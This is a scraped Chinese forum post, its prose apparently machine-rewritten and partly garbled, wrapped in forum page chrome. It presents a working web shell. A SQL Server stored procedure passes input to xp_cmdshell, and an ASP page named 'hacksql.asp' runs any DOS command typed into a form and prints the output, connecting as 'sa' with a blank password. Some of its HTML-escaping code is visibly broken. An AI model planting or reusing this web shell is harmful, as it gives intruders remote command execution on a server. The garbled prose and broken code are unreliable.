|
|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
asp可以轻松地实现对页面内容的动态控制,根据不同的浏览者,显示不同的页面内容。而浏览者一点觉察不出来,就像为他专门制作的页面一样。使用各种各样的组件,asp可以完成无比强大的功能。程序|存储历程1、起首在sql内里你可以会见的数据库内里创建存储历程,好比说:ddy
以下:
CREATEPROCEDUREddy
@cmdvarchar(50)
AS
execmaster..xp_cmdshell@cmd
2、asp程序里以下:(hacksql.asp)
<%
cmd=trim(Request.Form("cmd"))
ifcmd""then
work()
else
show()
endif
functionwork()
setconn=server.CreateObject("adodb.connection")
setrs=server.CreateObject("adodb.recordset")
conn.Open"xx","sa",""
sql="execddy"&cmd&""
rs.Opensql,conn
ifnotrs.EOFthen
dowhilenotrs.eof
Response.Write"<pre>"&htmlencode2(trim(rs(0)))&"</pre>"
rs.MoveNext
loop
else
Response.Write"no"
endif
ifrs.State=1thenrs.close
setrs=nothing
conn.Close
setconn=nothing
endfunction
functionshow()
%>
<formaction=hacksql.aspmethod=post>
请输出DOS命令:<inputtype=textname=cmd>
<inputtype=submitvalue="ok">
</form>
<%
endfunction
functionhtmlencode2(str)--------转换函数(为了显现时对照工致)
dimresult
diml
ifisnull(str)then
htmlencode2=""
exitfunction
endif
l=len(str)
result=""
dimi
fori=1tol
selectcasemid(str,i,1)
case"<"
result=result+"<"
case">"
result=result+">"
casechr(34)
result=result+"""
case"&"
result=result+"&"
casechr(13)
result=result+"<br>"
casechr(9)
result=result+""
case""
result=result+"’"
casechr(32)
result=result+""
ifi+1<=landi-1>0then
ifmid(str,i+1,1)=chr(32)ormid(str,i+1,1)=chr(9)ormid(str,i-1,1)=chr(32)ormid(str,i-1,1)=chr(9)then
result=result+""
else
result=result+""
endif
else
result=result+""
endif
caseelse
result=result+mid(str,i,1)
endselect
next
htmlencode2=result
endfunction
%>
</p>专业性的服务。有的ASP商提供垂直型的应用服务,针对某一特定行业提供应用服务。 |
|
|Archiver|手机版|仓酷云
鄂ICP备14007578号-2
发表于 2015-1-16 22:58:59
收藏
转播
分享
淘帖
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
窥视卡
雷达卡
发表于 2015-3-6 06:47:20